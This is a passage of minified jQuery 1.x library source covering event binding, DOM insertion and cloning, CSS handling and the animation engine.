m.event.remove(this,"._change"),!X.test(this.nodeName)}}),k.focusinBubbles||m.each({focus:"focusin",blur:"focusout"},function(a,b){var c=function(a){m.event.simulate(b,a.target,m.event.fix(a),!0)};m.event.special[b]={setup:function(){var d=this.ownerDocument||this,e=m._data(d,b);e||d.addEventListener(a,c,!0),m._data(d,b,(e||0)+1)},teardown:function(){var d=this.ownerDocument||this,e=m._data(d,b)-1;e?m._data(d,b,e):(d.removeEventListener(a,c,!0),m._removeData(d,b))}}}),m.fn.extend({on:function(a,b,c,d,e){var f,g;if("object"==typeof a){"string"!=typeof b&&(c=c||b,b=void 0);for(f in a)this.on(f,b,c,a[f],e);return this}if(null==c&&null==d?(d=b,c=b=void 0):null==d&&("string"==typeof b?(d=c,c=void 0):(d=c,c=b,b=void 0)),d===!1)d=bb;else if(!d)return this;return 1===e&&(g=d,d=function(a){return m().off(a),g.apply(this,arguments)},d.guid=g.guid||(g.guid=m.guid++)),this.each(function(){m.event.add(this,a,d,c,b)})},one:function(a,b,c,d){return this.on(a,b,c,d,1)},off:function(a,b,c){var d,e;if(a&&a.preventDefault&&a.handleObj)return d=a.handleObj,m(a.delegateTarget).off(d.namespace?d.origType+"."+d.namespace:d.origType,d.selector,d.handler),this;if("object"==typeof a){for(e in a)this.off(e,b,a[e]);return this}return(b===!1||"function"==typeof b)&&(c=b,b=void 0),c===!1&&(c=bb),this.each(function(){m.event.remove(this,a,c,b)})},trigger:function(a,b){return this.each(function(){m.event.trigger(a,b,this)})},triggerHandler:function(a,b){var c=this[0];return c?m.event.trigger(a,b,c,!0):void 0}});function db(a){var b=eb.split("|"),c=a.createDocumentFragment();if(c.createElement)while(b.length)c.createElement(b.pop());return c}var eb="abbr|article|aside|audio|bdi|canvas|data|datalist|details|figcaption|figure|footer|header|hgroup|mark|meter|nav|output|progress|section|summary|time|video",fb=/ jQuery\d+="(?:null|\d+)"/g,gb=new RegExp("<(?:"+eb+")[\\s/>]","i"),hb=/^\s+/,ib=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,jb=/<([\w:]+)/,kb=/<tbody/i,lb=/<|&#?\w+;/,mb=/<(?:script|style|link)/i,nb=/checked\s*(?:[^=]|=\s*.checked.)/i,ob=/^$|\/(?:java|ecma)script/i,pb=/^true\/(.*)/,qb=/^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g,rb={option:[1,"<select multiple='multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],area:[1,"<map>","</map>"],param:[1,"<object>","</object>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],col:[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],_default:k.htmlSerialize?[0,"",""]:[1,"X<div>","</div>"]},sb=db(y),tb=sb.appendChild(y.createElement("div"));rb.optgroup=rb.option,rb.tbody=rb.tfoot=rb.colgroup=rb.caption=rb.thead,rb.th=rb.td;function ub(a,b){var c,d,e=0,f=typeof a.getElementsByTagName!==K?a.getElementsByTagName(b||"*"):typeof a.querySelectorAll!==K?a.querySelectorAll(b||"*"):void 0;if(!f)for(f=[],c=a.childNodes||a;null!=(d=c[e]);e++)!b||m.nodeName(d,b)?f.push(d):m.merge(f,ub(d,b));return void 0===b||b&&m.nodeName(a,b)?m.merge([a],f):f}function vb(a){W.test(a.type)&&(a.defaultChecked=a.checked)}function wb(a,b){return m.nodeName(a,"table")&&m.nodeName(11!==b.nodeType?b:b.firstChild,"tr")?a.getElementsByTagName("tbody")[0]||a.appendChild(a.ownerDocument.createElement("tbody")):a}function xb(a){return a.type=(null!==m.find.attr(a,"type"))+"/"+a.type,a}function yb(a){var b=pb.exec(a.type);return b?a.type=b[1]:a.removeAttribute("type"),a}function zb(a,b){for(var c,d=0;null!=(c=a[d]);d++)m._data(c,"globalEval",!b||m._data(b[d],"globalEval"))}function Ab(a,b){if(1===b.nodeType&&m.hasData(a)){var c,d,e,f=m._data(a),g=m._data(b,f),h=f.events;if(h){delete g.handle,g.events={};for(c in h)for(d=0,e=h[c].length;e>d;d++)m.event.add(b,c,h[c][d])}g.data&&(g.data=m.extend({},g.data))}}function Bb(a,b){var c,d,e;if(1===b.nodeType){if(c=b.nodeName.toLowerCase(),!k.noCloneEvent&&b[m.expando]){e=m._data(b);for(d in e.events)m.removeEvent(b,d,e.handle);b.removeAttribute(m.expando)}"script"===c&&b.text!==a.text?(xb(b).text=a.text,yb(b)):"object"===c?(b.parentNode&&(b.outerHTML=a.outerHTML),k.html5Clone&&a.innerHTML&&!m.trim(b.innerHTML)&&(b.innerHTML=a.innerHTML)):"input"===c&&W.test(a.type)?(b.defaultChecked=b.checked=a.checked,b.value!==a.value&&(b.value=a.value)):"option"===c?b.defaultSelected=b.selected=a.defaultSelected:("input"===c||"textarea"===c)&&(b.defaultValue=a.defaultValue)}}m.extend({clone:function(a,b,c){var d,e,f,g,h,i=m.contains(a.ownerDocument,a);if(k.html5Clone||m.isXMLDoc(a)||!gb.test("<"+a.nodeName+">")?f=a.cloneNode(!0):(tb.innerHTML=a.outerHTML,tb.removeChild(f=tb.firstChild)),!(k.noCloneEvent&&k.noCloneChecked||1!==a.nodeType&&11!==a.nodeType||m.isXMLDoc(a)))for(d=ub(f),h=ub(a),g=0;null!=(e=h[g]);++g)d[g]&&Bb(e,d[g]);if(b)if(c)for(h=h||ub(a),d=d||ub(f),g=0;null!=(e=h[g]);g++)Ab(e,d[g]);else Ab(a,f);return d=ub(f,"script"),d.length>0&&zb(d,!i&&ub(a,"script")),d=h=e=null,f},buildFragment:function(a,b,c,d){for(var e,f,g,h,i,j,l,n=a.length,o=db(b),p=[],q=0;n>q;q++)if(f=a[q],f||0===f)if("object"===m.type(f))m.merge(p,f.nodeType?[f]:f);else if(lb.test(f)){h=h||o.appendChild(b.createElement("div")),i=(jb.exec(f)||["",""])[1].toLowerCase(),l=rb[i]||rb._default,h.innerHTML=l[1]+f.replace(ib,"<$1></$2>")+l[2],e=l[0];while(e--)h=h.lastChild;if(!k.leadingWhitespace&&hb.test(f)&&p.push(b.createTextNode(hb.exec(f)[0])),!k.tbody){f="table"!==i||kb.test(f)?"<table>"!==l[1]||kb.test(f)?0:h:h.firstChild,e=f&&f.childNodes.length;while(e--)m.nodeName(j=f.childNodes[e],"tbody")&&!j.childNodes.length&&f.removeChild(j)}m.merge(p,h.childNodes),h.textContent="";while(h.firstChild)h.removeChild(h.firstChild);h=o.lastChild}else p.push(b.createTextNode(f));h&&o.removeChild(h),k.appendChecked||m.grep(ub(p,"input"),vb),q=0;while(f=p[q++])if((!d||-1===m.inArray(f,d))&&(g=m.contains(f.ownerDocument,f),h=ub(o.appendChild(f),"script"),g&&zb(h),c)){e=0;while(f=h[e++])ob.test(f.type||"")&&c.push(f)}return h=null,o},cleanData:function(a,b){for(var d,e,f,g,h=0,i=m.expando,j=m.cache,l=k.deleteExpando,n=m.event.special;null!=(d=a[h]);h++)if((b||m.acceptData(d))&&(f=d[i],g=f&&j[f])){if(g.events)for(e in g.events)n[e]?m.event.remove(d,e):m.removeEvent(d,e,g.handle);j[f]&&(delete j[f],l?delete d[i]:typeof d.removeAttribute!==K?d.removeAttribute(i):d[i]=null,c.push(f))}}}),m.fn.extend({text:function(a){return V(this,function(a){return void 0===a?m.text(this):this.empty().append((this[0]&&this[0].ownerDocument||y).createTextNode(a))},null,a,arguments.length)},append:function(){return this.domManip(arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=wb(this,a);b.appendChild(a)}})},prepend:function(){return this.domManip(arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=wb(this,a);b.insertBefore(a,b.firstChild)}})},before:function(){return this.domManip(arguments,function(a){this.parentNode&&this.parentNode.insertBefore(a,this)})},after:function(){return this.domManip(arguments,function(a){this.parentNode&&this.parentNode.insertBefore(a,this.nextSibling)})},remove:function(a,b){for(var c,d=a?m.filter(a,this):this,e=0;null!=(c=d[e]);e++)b||1!==c.nodeType||m.cleanData(ub(c)),c.parentNode&&(b&&m.contains(c.ownerDocument,c)&&zb(ub(c,"script")),c.parentNode.removeChild(c));return this},empty:function(){for(var a,b=0;null!=(a=this[b]);b++){1===a.nodeType&&m.cleanData(ub(a,!1));while(a.firstChild)a.removeChild(a.firstChild);a.options&&m.nodeName(a,"select")&&(a.options.length=0)}return this},clone:function(a,b){return a=null==a?!1:a,b=null==b?a:b,this.map(function(){return m.clone(this,a,b)})},html:function(a){return V(this,function(a){var b=this[0]||{},c=0,d=this.length;if(void 0===a)return 1===b.nodeType?b.innerHTML.replace(fb,""):void 0;if(!("string"!=typeof a||mb.test(a)||!k.htmlSerialize&&gb.test(a)||!k.leadingWhitespace&&hb.test(a)||rb[(jb.exec(a)||["",""])[1].toLowerCase()])){a=a.replace(ib,"<$1></$2>");try{for(;d>c;c++)b=this[c]||{},1===b.nodeType&&(m.cleanData(ub(b,!1)),b.innerHTML=a);b=0}catch(e){}}b&&this.empty().append(a)},null,a,arguments.length)},replaceWith:function(){var a=arguments[0];return this.domManip(arguments,function(b){a=this.parentNode,m.cleanData(ub(this)),a&&a.replaceChild(b,this)}),a&&(a.length||a.nodeType)?this:this.remove()},detach:function(a){return this.remove(a,!0)},domManip:function(a,b){a=e.apply([],a);var c,d,f,g,h,i,j=0,l=this.length,n=this,o=l-1,p=a[0],q=m.isFunction(p);if(q||l>1&&"string"==typeof p&&!k.checkClone&&nb.test(p))return this.each(function(c){var d=n.eq(c);q&&(a[0]=p.call(this,c,d.html())),d.domManip(a,b)});if(l&&(i=m.buildFragment(a,this[0].ownerDocument,!1,this),c=i.firstChild,1===i.childNodes.length&&(i=c),c)){for(g=m.map(ub(i,"script"),xb),f=g.length;l>j;j++)d=i,j!==o&&(d=m.clone(d,!0,!0),f&&m.merge(g,ub(d,"script"))),b.call(this[j],d,j);if(f)for(h=g[g.length-1].ownerDocument,m.map(g,yb),j=0;f>j;j++)d=g[j],ob.test(d.type||"")&&!m._data(d,"globalEval")&&m.contains(h,d)&&(d.src?m._evalUrl&&m._evalUrl(d.src):m.globalEval((d.text||d.textContent||d.innerHTML||"").replace(qb,"")));i=c=null}return this}}),m.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(a,b){m.fn[a]=function(a){for(var c,d=0,e=[],g=m(a),h=g.length-1;h>=d;d++)c=d===h?this:this.clone(!0),m(g[d])[b](c),f.apply(e,c.get());return this.pushStack(e)}});var Cb,Db={};function Eb(b,c){var d,e=m(c.createElement(b)).appendTo(c.body),f=a.getDefaultComputedStyle&&(d=a.getDefaultComputedStyle(e[0]))?d.display:m.css(e[0],"display");return e.detach(),f}function Fb(a){var b=y,c=Db[a];return c||(c=Eb(a,b),"none"!==c&&c||(Cb=(Cb||m("<iframe frameborder='0' width='0' height='0'/>")).appendTo(b.documentElement),b=(Cb[0].contentWindow||Cb[0].contentDocument).document,b.write(),b.close(),c=Eb(a,b),Cb.detach()),Db[a]=c),c}!function(){var a;k.shrinkWrapBlocks=function(){if(null!=a)return a;a=!1;var b,c,d;return c=y.getElementsByTagName("body")[0],c&&c.style?(b=y.createElement("div"),d=y.createElement("div"),d.style.cssText="position:absolute;border:0;width:0;height:0;top:0;left:-9999px",c.appendChild(d).appendChild(b),typeof b.style.zoom!==K&&(b.style.cssText="-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;display:block;margin:0;border:0;padding:1px;width:1px;zoom:1",b.appendChild(y.createElement("div")).style.width="5px",a=3!==b.offsetWidth),c.removeChild(d),a):void 0}}();var Gb=/^margin/,Hb=new RegExp("^("+S+")(?!px)[a-z%]+$","i"),Ib,Jb,Kb=/^(top|right|bottom|left)$/;a.getComputedStyle?(Ib=function(a){return a.ownerDocument.defaultView.getComputedStyle(a,null)},Jb=function(a,b,c){var d,e,f,g,h=a.style;return c=c||Ib(a),g=c?c.getPropertyValue(b)||c[b]:void 0,c&&(""!==g||m.contains(a.ownerDocument,a)||(g=m.style(a,b)),Hb.test(g)&&Gb.test(b)&&(d=h.width,e=h.minWidth,f=h.maxWidth,h.minWidth=h.maxWidth=h.width=g,g=c.width,h.width=d,h.minWidth=e,h.maxWidth=f)),void 0===g?g:g+""}):y.documentElement.currentStyle&&(Ib=function(a){return a.currentStyle},Jb=function(a,b,c){var d,e,f,g,h=a.style;return c=c||Ib(a),g=c?c[b]:void 0,null==g&&h&&h[b]&&(g=h[b]),Hb.test(g)&&!Kb.test(b)&&(d=h.left,e=a.runtimeStyle,f=e&&e.left,f&&(e.left=a.currentStyle.left),h.left="fontSize"===b?"1em":g,g=h.pixelLeft+"px",h.left=d,f&&(e.left=f)),void 0===g?g:g+""||"auto"});function Lb(a,b){return{get:function(){var c=a();if(null!=c)return c?void delete this.get:(this.get=b).apply(this,arguments)}}}!function(){var b,c,d,e,f,g,h;if(b=y.createElement("div"),b.innerHTML="  <link/><table></table><a href='/a'>a</a><input type='checkbox'/>",d=b.getElementsByTagName("a")[0],c=d&&d.style){c.cssText="float:left;opacity:.5",k.opacity="0.5"===c.opacity,k.cssFloat=!!c.cssFloat,b.style.backgroundClip="content-box",b.cloneNode(!0).style.backgroundClip="",k.clearCloneStyle="content-box"===b.style.backgroundClip,k.boxSizing=""===c.boxSizing||""===c.MozBoxSizing||""===c.WebkitBoxSizing,m.extend(k,{reliableHiddenOffsets:function(){return null==g&&i(),g},boxSizingReliable:function(){return null==f&&i(),f},pixelPosition:function(){return null==e&&i(),e},reliableMarginRight:function(){return null==h&&i(),h}});function i(){var b,c,d,i;c=y.getElementsByTagName("body")[0],c&&c.style&&(b=y.createElement("div"),d=y.createElement("div"),d.style.cssText="position:absolute;border:0;width:0;height:0;top:0;left:-9999px",c.appendChild(d).appendChild(b),b.style.cssText="-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;display:block;margin-top:1%;top:1%;border:1px;padding:1px;width:4px;position:absolute",e=f=!1,h=!0,a.getComputedStyle&&(e="1%"!==(a.getComputedStyle(b,null)||{}).top,f="4px"===(a.getComputedStyle(b,null)||{width:"4px"}).width,i=b.appendChild(y.createElement("div")),i.style.cssText=b.style.cssText="-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;display:block;margin:0;border:0;padding:0",i.style.marginRight=i.style.width="0",b.style.width="1px",h=!parseFloat((a.getComputedStyle(i,null)||{}).marginRight)),b.innerHTML="<table><tr><td></td><td>t</td></tr></table>",i=b.getElementsByTagName("td"),i[0].style.cssText="margin:0;border:0;padding:0;display:none",g=0===i[0].offsetHeight,g&&(i[0].style.display="",i[1].style.display="none",g=0===i[0].offsetHeight),c.removeChild(d))}}}(),m.swap=function(a,b,c,d){var e,f,g={};for(f in b)g[f]=a.style[f],a.style[f]=b[f];e=c.apply(a,d||[]);for(f in b)a.style[f]=g[f];return e};var Mb=/alpha\([^)]*\)/i,Nb=/opacity\s*=\s*([^)]*)/,Ob=/^(none|table(?!-c[ea]).+)/,Pb=new RegExp("^("+S+")(.*)$","i"),Qb=new RegExp("^([+-])=("+S+")","i"),Rb={position:"absolute",visibility:"hidden",display:"block"},Sb={letterSpacing:"0",fontWeight:"400"},Tb=["Webkit","O","Moz","ms"];function Ub(a,b){if(b in a)return b;var c=b.charAt(0).toUpperCase()+b.slice(1),d=b,e=Tb.length;while(e--)if(b=Tb[e]+c,b in a)return b;return d}function Vb(a,b){for(var c,d,e,f=[],g=0,h=a.length;h>g;g++)d=a[g],d.style&&(f[g]=m._data(d,"olddisplay"),c=d.style.display,b?(f[g]||"none"!==c||(d.style.display=""),""===d.style.display&&U(d)&&(f[g]=m._data(d,"olddisplay",Fb(d.nodeName)))):(e=U(d),(c&&"none"!==c||!e)&&m._data(d,"olddisplay",e?c:m.css(d,"display"))));for(g=0;h>g;g++)d=a[g],d.style&&(b&&"none"!==d.style.display&&""!==d.style.display||(d.style.display=b?f[g]||"":"none"));return a}function Wb(a,b,c){var d=Pb.exec(b);return d?Math.max(0,d[1]-(c||0))+(d[2]||"px"):b}function Xb(a,b,c,d,e){for(var f=c===(d?"border":"content")?4:"width"===b?1:0,g=0;4>f;f+=2)"margin"===c&&(g+=m.css(a,c+T[f],!0,e)),d?("content"===c&&(g-=m.css(a,"padding"+T[f],!0,e)),"margin"!==c&&(g-=m.css(a,"border"+T[f]+"Width",!0,e))):(g+=m.css(a,"padding"+T[f],!0,e),"padding"!==c&&(g+=m.css(a,"border"+T[f]+"Width",!0,e)));return g}function Yb(a,b,c){var d=!0,e="width"===b?a.offsetWidth:a.offsetHeight,f=Ib(a),g=k.boxSizing&&"border-box"===m.css(a,"boxSizing",!1,f);if(0>=e||null==e){if(e=Jb(a,b,f),(0>e||null==e)&&(e=a.style[b]),Hb.test(e))return e;d=g&&(k.boxSizingReliable()||e===a.style[b]),e=parseFloat(e)||0}return e+Xb(a,b,c||(g?"border":"content"),d,f)+"px"}m.extend({cssHooks:{opacity:{get:function(a,b){if(b){var c=Jb(a,"opacity");return""===c?"1":c}}}},cssNumber:{columnCount:!0,fillOpacity:!0,flexGrow:!0,flexShrink:!0,fontWeight:!0,lineHeight:!0,opacity:!0,order:!0,orphans:!0,widows:!0,zIndex:!0,zoom:!0},cssProps:{"float":k.cssFloat?"cssFloat":"styleFloat"},style:function(a,b,c,d){if(a&&3!==a.nodeType&&8!==a.nodeType&&a.style){var e,f,g,h=m.camelCase(b),i=a.style;if(b=m.cssProps[h]||(m.cssProps[h]=Ub(i,h)),g=m.cssHooks[b]||m.cssHooks[h],void 0===c)return g&&"get"in g&&void 0!==(e=g.get(a,!1,d))?e:i[b];if(f=typeof c,"string"===f&&(e=Qb.exec(c))&&(c=(e[1]+1)*e[2]+parseFloat(m.css(a,b)),f="number"),null!=c&&c===c&&("number"!==f||m.cssNumber[h]||(c+="px"),k.clearCloneStyle||""!==c||0!==b.indexOf("background")||(i[b]="inherit"),!(g&&"set"in g&&void 0===(c=g.set(a,c,d)))))try{i[b]=c}catch(j){}}},css:function(a,b,c,d){var e,f,g,h=m.camelCase(b);return b=m.cssProps[h]||(m.cssProps[h]=Ub(a.style,h)),g=m.cssHooks[b]||m.cssHooks[h],g&&"get"in g&&(f=g.get(a,!0,c)),void 0===f&&(f=Jb(a,b,d)),"normal"===f&&b in Sb&&(f=Sb[b]),""===c||c?(e=parseFloat(f),c===!0||m.isNumeric(e)?e||0:f):f}}),m.each(["height","width"],function(a,b){m.cssHooks[b]={get:function(a,c,d){return c?Ob.test(m.css(a,"display"))&&0===a.offsetWidth?m.swap(a,Rb,function(){return Yb(a,b,d)}):Yb(a,b,d):void 0},set:function(a,c,d){var e=d&&Ib(a);return Wb(a,c,d?Xb(a,b,d,k.boxSizing&&"border-box"===m.css(a,"boxSizing",!1,e),e):0)}}}),k.opacity||(m.cssHooks.opacity={get:function(a,b){return Nb.test((b&&a.currentStyle?a.currentStyle.filter:a.style.filter)||"")?.01*parseFloat(RegExp.$1)+"":b?"1":""},set:function(a,b){var c=a.style,d=a.currentStyle,e=m.isNumeric(b)?"alpha(opacity="+100*b+")":"",f=d&&d.filter||c.filter||"";c.zoom=1,(b>=1||""===b)&&""===m.trim(f.replace(Mb,""))&&c.removeAttribute&&(c.removeAttribute("filter"),""===b||d&&!d.filter)||(c.filter=Mb.test(f)?f.replace(Mb,e):f+" "+e)}}),m.cssHooks.marginRight=Lb(k.reliableMarginRight,function(a,b){return b?m.swap(a,{display:"inline-block"},Jb,[a,"marginRight"]):void 0}),m.each({margin:"",padding:"",border:"Width"},function(a,b){m.cssHooks[a+b]={expand:function(c){for(var d=0,e={},f="string"==typeof c?c.split(" "):[c];4>d;d++)e[a+T[d]+b]=f[d]||f[d-2]||f[0];return e}},Gb.test(a)||(m.cssHooks[a+b].set=Wb)}),m.fn.extend({css:function(a,b){return V(this,function(a,b,c){var d,e,f={},g=0;if(m.isArray(b)){for(d=Ib(a),e=b.length;e>g;g++)f[b[g]]=m.css(a,b[g],!1,d);return f}return void 0!==c?m.style(a,b,c):m.css(a,b)},a,b,arguments.length>1)},show:function(){return Vb(this,!0)},hide:function(){return Vb(this)},toggle:function(a){return"boolean"==typeof a?a?this.show():this.hide():this.each(function(){U(this)?m(this).show():m(this).hide()})}});function Zb(a,b,c,d,e){return new Zb.prototype.init(a,b,c,d,e)}m.Tween=Zb,Zb.prototype={constructor:Zb,init:function(a,b,c,d,e,f){this.elem=a,this.prop=c,this.easing=e||"swing",this.options=b,this.start=this.now=this.cur(),this.end=d,this.unit=f||(m.cssNumber[c]?"":"px")
+    },cur:function(){var a=Zb.propHooks[this.prop];return a&&a.get?a.get(this):Zb.propHooks._default.get(this)},run:function(a){var b,c=Zb.propHooks[this.prop];return this.pos=b=this.options.duration?m.easing[this.easing](a,this.options.duration*a,0,1,this.options.duration):a,this.now=(this.end-this.start)*b+this.start,this.options.step&&this.options.step.call(this.elem,this.now,this),c&&c.set?c.set(this):Zb.propHooks._default.set(this),this}},Zb.prototype.init.prototype=Zb.prototype,Zb.propHooks={_default:{get:function(a){var b;return null==a.elem[a.prop]||a.elem.style&&null!=a.elem.style[a.prop]?(b=m.css(a.elem,a.prop,""),b&&"auto"!==b?b:0):a.elem[a.prop]},set:function(a){m.fx.step[a.prop]?m.fx.step[a.prop](a):a.elem.style&&(null!=a.elem.style[m.cssProps[a.prop]]||m.cssHooks[a.prop])?m.style(a.elem,a.prop,a.now+a.unit):a.elem[a.prop]=a.now}}},Zb.propHooks.scrollTop=Zb.propHooks.scrollLeft={set:function(a){a.elem.nodeType&&a.elem.parentNode&&(a.elem[a.prop]=a.now)}},m.easing={linear:function(a){return a},swing:function(a){return.5-Math.cos(a*Math.PI)/2}},m.fx=Zb.prototype.init,m.fx.step={};var $b,_b,ac=/^(?:toggle|show|hide)$/,bc=new RegExp("^(?:([+-])=|)("+S+")([a-z%]*)$","i"),cc=/queueHooks$/,dc=[ic],ec={"*":[function(a,b){var c=this.createTween(a,b),d=c.cur(),e=bc.exec(b),f=e&&e[3]||(m.cssNumber[a]?"":"px"),g=(m.cssNumber[a]||"px"!==f&&+d)&&bc.exec(m.css(c.elem,a)),h=1,i=20;if(g&&g[3]!==f){f=f||g[3],e=e||[],g=+d||1;do h=h||".5",g/=h,m.style(c.elem,a,g+f);while(h!==(h=c.cur()/d)&&1!==h&&--i)}return e&&(g=c.start=+g||+d||0,c.unit=f,c.end=e[1]?g+(e[1]+1)*e[2]:+e[2]),c}]};function fc(){return setTimeout(function(){$b=void 0}),$b=m.now()}function gc(a,b){var c,d={height:a},e=0;for(b=b?1:0;4>e;e+=2-b)c=T[e],d["margin"+c]=d["padding"+c]=a;return b&&(d.opacity=d.width=a),d}function hc(a,b,c){for(var d,e=(ec[b]||[]).concat(ec["*"]),f=0,g=e.length;g>f;f++)if(d=e[f].call(c,b,a))return d}function ic(a,b,c){var d,e,f,g,h,i,j,l,n=this,o={},p=a.style,q=a.nodeType&&U(a),r=m._data(a,"fxshow");c.queue||(h=m._queueHooks(a,"fx"),null==h.unqueued&&(h.unqueued=0,i=h.empty.fire,h.empty.fire=function(){h.unqueued||i()}),h.unqueued++,n.always(function(){n.always(function(){h.unqueued--,m.queue(a,"fx").length||h.empty.fire()})})),1===a.nodeType&&("height"in b||"width"in b)&&(c.overflow=[p.overflow,p.overflowX,p.overflowY],j=m.css(a,"display"),l="none"===j?m._data(a,"olddisplay")||Fb(a.nodeName):j,"inline"===l&&"none"===m.css(a,"float")&&(k.inlineBlockNeedsLayout&&"inline"!==Fb(a.nodeName)?p.zoom=1:p.display="inline-block")),c.overflow&&(p.overflow="hidden",k.shrinkWrapBlocks()||n.always(function(){p.overflow=c.overflow[0],p.overflowX=c.overflow[1],p.overflowY=c.overflow[2]}));for(d in b)if(e=b[d],ac.exec(e)){if(delete b[d],f=f||"toggle"===e,e===(q?"hide":"show")){if("show"!==e||!r||void 0===r[d])continue;q=!0}o[d]=r&&r[d]||m.style(a,d)}else j=void 0;if(m.isEmptyObject(o))"inline"===("none"===j?Fb(a.nodeName):j)&&(p.display=j);else{r?"hidden"in r&&(q=r.hidden):r=m._data(a,"fxshow",{}),f&&(r.hidden=!q),q?m(a).show():n.done(function(){m(a).hide()}),n.done(function(){var b;m._removeData(a,"fxshow");for(b in o)m.style(a,b,o[b])});for(d in o)g=hc(q?r[d]:0,d,n),d in r||(r[d]=g.start,q&&(g.end=g.start,g.start="width"===d||"height"===d?1:0))}}function jc(a,b){var c,d,e,f,g;for(c in a)if(d=m.camelCase(c),e=b[d],f=a[c],m.isArray(f)&&(e=f[1],f=a[c]=f[0]),c!==d&&(a[d]=f,delete a[c]),g=m.cssHooks[d],g&&"expand"in g){f=g.expand(f),delete a[d];for(c in f)c in a||(a[c]=f[c],b[c]=e)}else b[d]=e}function kc(a,b,c){var d,e,f=0,g=dc.length,h=m.Deferred().always(function(){delete i.elem}),i=function(){if(e)return!1;for(var b=$b||fc(),c=Math.max(0,j.startTime+j.duration-b),d=c/j.duration||0,f=1-d,g=0,i=j.tweens.length;i>g;g++)j.tweens[g].run(f);return h.notifyWith(a,[j,f,c]),1>f&&i?c:(h.resolveWith(a,[j]),!1)},j=h.promise({elem:a,props:m.extend({},b),opts:m.extend(!0,{specialEasing:{}},c),originalProperties:b,originalOptions:c,startTime:$b||fc(),duration:c.duration,tweens:[],createTween:function(b,c){var d=m.Tween(a,j.opts,b,c,j.opts.specialEasing[b]||j.opts.easing);return j.tweens.push(d),d},stop:function(b){var c=0,d=b?j.tweens.length:0;if(e)return this;for(e=!0;d>c;c++)j.tweens[c].run(1);return b?h.resolveWith(a,[j,b]):h.rejectWith(a,[j,b]),this}}),k=j.props;for(jc(k,j.opts.specialEasing);g>f;f++)if(d=dc[f].call(j,a,k,j.opts))return d;return m.map(k,hc,j),m.isFunction(j.opts.start)&&j.opts.start.call(a,j),m.fx.timer(m.extend(i,{elem:a,anim:j,queue:j.opts.queue})),j.progress(j.opts.progress).done(j.opts.done,j.opts.complete).fail(j.opts.fail).always(j.opts.always)}m.Animation=m.extend(kc,{tweener:function(a,b){m.isFunction(a)?(b=a,a=["*"]):a=a.split(" ");for(var c,d=0,e=a.length;e>d;d++)c=a[d],ec[c]=ec[c]||[],ec[c].unshift(b)},prefilter:function(a,b){b?dc.unshift(a):dc.push(a)}}),m.speed=function(a,b,c){var d=a&&"object"==typeof a?m.extend({},a):{complete:c||!c&&b||m.isFunction(a)&&a,duration:a,easing:c&&b||b&&!m.isFunction(b)&&b};return d.duration=m.fx.off?0:"number"==typeof d.duration?d.duration:d.duration in m.fx.speeds?m.fx.speeds[d.duration]:m.fx.speeds._default,(null==d.queue||d.queue===!0)&&(d.queue="fx"),d.old=d.complete,d.complete=function(){m.isFunction(d.old)&&d.old.call(this),d.queue&&m.dequeue(this,d.queue)},d},m.fn.extend({fadeTo:function(a,b,c,d){return this.filter(U).css("opacity",0).show().end().animate({opacity:b},a,c,d)},animate:function(a,b,c,d){var e=m.isEmptyObject(a),f=m.speed(b,c,d),g=function(){var b=kc(this,m.extend({},a),f);(e||m._data(this,"finish"))&&b.stop(!0)};return g.finish=g,e||f.queue===!1?this.each(g):this.queue(f.queue,g)},stop:function(a,b,c){var d=function(a){var b=a.stop;delete a.stop,b(c)};return"string"!=typeof a&&(c=b,b=a,a=void 0),b&&a!==!1&&this.queue(a||"fx",[]),this.each(function(){var b=!0,e=null!=a&&a+"queueHooks",f=m.timers,g=m._data(this);if(e)g[e]&&g[e].stop&&d(g[e]);else for(e in g)g[e]&&g[e].stop&&cc.test(e)&&d(g[e]);for(e=f.length;e--;)f[e].elem!==this||null!=a&&f[e].queue!==a||(f[e].anim.stop(c),b=!1,f.splice(e,1));(b||!c)&&m.dequeue(this,a)})},finish:function(a){return a!==!1&&(a=a||"fx"),this.each(function(){var b,c=m._data(this),d=c[a+"queue"],e=c[a+"queueHooks"],f=m.timers,g=d?d.length:0;for(c.finish=!0,m.queue(this,a,[]),e&&e.stop&&e.stop.call(this,!0),b=f.length;b--;)f[b].elem===this&&f[b].queue===a&&(f[b].anim.stop(!0),f.splice(b,1));for(b=0;g>b;b++)d[b]&&d[b].finish&&d[b].finish.call(this);delete c.finish})}}),m.each(["toggle","show","hide"],function(a,b){var c=m.fn[b];m.fn[b]=function(a,d,e){return null==a||"boolean"==typeof a?c.apply(this,arguments):this.animate(gc(b,!0),a,d,e)}}),m.each({slideDown:gc("show"),slideUp:gc("hide"),slideToggle:gc("toggle"),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(a,b){m.fn[a]=function(a,c,d){return this.animate(b,a,c,d)}}),m.timers=[],m.fx.tick=function(){var a,b=m.timers,c=0;for($b=m.now();c<b.length;c++)a=b[c],a()||b[c]!==a||b.splice(c--,1);b.length||m.fx.stop(),$b=void 0},m.fx.timer=function(a){m.timers.push(a),a()?m.fx.start():m.timers.pop()},m.fx.interval=13,m.fx.start=function(){_b||(_b=setInterval(m.fx.tick,m.fx.interval))},m.fx.stop=function(){clearInterval(_b),_b=null},m.fx.speeds={slow:600,fast:200,_default:400},m.fn.delay=function(a,b){return a=m.fx?m.fx.speeds[a]||a:a,b=b||"fx",this.queue(b,function(b,c){var d=setTimeout(b,a);c.stop=function(){clearTimeout(d)}})},function(){var a,b,c,d,e;b=y.createElement("div"),b.setAttribute("className","t"),b.innerHTML="  <link/><table></table><a href='/a'>a</a><input 